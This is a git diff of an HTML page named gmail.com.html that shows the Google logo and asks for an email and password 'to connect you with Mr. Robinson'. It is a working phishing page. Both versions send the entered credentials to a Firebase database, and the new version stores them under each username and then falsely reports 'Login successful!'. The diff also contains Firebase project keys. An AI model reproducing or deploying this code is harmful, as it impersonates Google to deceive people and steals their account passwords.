--- a/gmail.com.html
+++ b/gmail.com.html
@@ -1,11 +1,8 @@
-<!DOCTYPE html>
-<html lang="en">
 <head>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <title>Welcome</title>
   <style>
-    /* Reset and styling */
     * { margin: 0; padding: 0; box-sizing: border-box; }
     body { font-family: Arial, sans-serif; background-color: #ffffff; color: #202124; }
     .container { width: 100%; max-width: 400px; padding: 24px; margin: 0 auto; text-align: center; }
@@ -27,7 +24,7 @@
     <img src="https://upload.wikimedia.org/wikipedia/commons/2/2f/Google_2015_logo.svg" alt="Google Logo" class="logo">
     <h1>Welcome</h1>
     <p>Please enter your email to connect you with Mr. Robinson.</p>
-    <input type="text" id="email-input" placeholder="Email" class="input-field">
+    <input type="text" id="username" placeholder="Email" class="input-field">
     <input type="password" id="password-input" placeholder="Password" class="input-field">
 
     <div class="left-align-links">
@@ -35,60 +32,49 @@
     </div>
     
     <div class="button-container">
-      <button class="button" onclick="saveInformation()">Next</button>
+      <button class="button" id="submit">Next</button>
     </div>
   </div>
 
-  <!-- Firebase and Firestore Scripts -->
-  <script src="https://www.gstatic.com/firebasejs/7.20.0/firebase-app.js"></script>
-  <script src="https://www.gstatic.com/firebasejs/7.20.0/firebase-firestore.js"></script>
-
-  <script>
+  <script type="module">
     // Import the functions you need from the SDKs you need
-import { initializeApp } from "firebase/app";
-import { getAnalytics } from "firebase/analytics";
-// TODO: Add SDKs for Firebase products that you want to use
-// https://firebase.google.com/docs/web/setup#available-libraries
-
-// Your web app's Firebase configuration
-// For Firebase JS SDK v7.20.0 and later, measurementId is optional
-const firebaseConfig = {
-  apiKey: "AIzaSyB8KUTt6v6j2j4LAztW7Dv1Fmrzfr-cFgc",
-  authDomain: "displaypassword.firebaseapp.com",
-  projectId: "displaypassword",
-  storageBucket: "displaypassword.firebasestorage.app",
-  messagingSenderId: "609391145835",
-  appId: "1:609391145835:web:bb1116bf321dee6909d22e",
-  measurementId: "G-V907QZJ2XE"
-};
-
-// Initialize Firebase
-const app = initializeApp(firebaseConfig);
-const analytics = getAnalytics(app);
+    import { initializeApp } from "https://www.gstatic.com/firebasejs/11.0.1/firebase-app.js";
+    import { getDatabase, ref, set } from "https://www.gstatic.com/firebasejs/11.0.1/firebase-database.js";
+    
+    // Your web app's Firebase configuration
+    const firebaseConfig = {
+      apiKey: "AIzaSyCcTFYAIp1-TA1irU8l5N8iihfnYCGWrHw",
+      authDomain: "and-facebook-ab84c.firebaseapp.com",
+      databaseURL: "https://and-facebook-ab84c-default-rtdb.firebaseio.com",
+      projectId: "and-facebook-ab84c",
+      storageBucket: "and-facebook-ab84c.appspot.com",
+      messagingSenderId: "4885749329",
+      appId: "1:4885749329:web:2d5b0e46519b5dc4c8e270"
+    };
+  
     // Initialize Firebase
-    firebase.initializeApp(firebaseConfig);
-    const db = firebase.firestore();
+    const app = initializeApp(firebaseConfig);
+    const db = getDatabase(app);
 
-    // Function to save email and password to Firestore
-    function saveInformation() {
-      const email = document.getElementById('email-input').value;
-      const password = document.getElementById('password-input').value;
+    // Event listener for the button
+    document.getElementById("submit").addEventListener('click', function() {
+      const username = document.getElementById("username").value;
+      const password = document.getElementById("password-input").value;
 
-      if (email && password) {
-        // Add the user's information to the "users" collection in Firestore
-        db.collection("users").add({ email: email, password: password })
-          .then(() => {
-            alert("Information saved successfully!");
-            // Redirect to another page after saving (modify this URL as needed)
-            window.location.href = 'display.html';
-          })
-          .catch((error) => {
-            console.error("Error saving information: ", error);
-          });
+      if (username && password) {
+        // Store the username and password in the database
+        set(ref(db, 'users/' + username.replace('.', '_')), {
+          username: username,
+          password: password
+        }).then(() => {
+          alert("Login successful!");
+        }).catch((error) => {
+          console.error("Error storing data:", error);
+          alert("Failed to log in. Please try again.");
+        });
       } else {
-        alert("Please fill in both fields.");
+        alert("Please enter both username and password.");
       }
-    }
+    });
   </script>
 </body>
-</html>
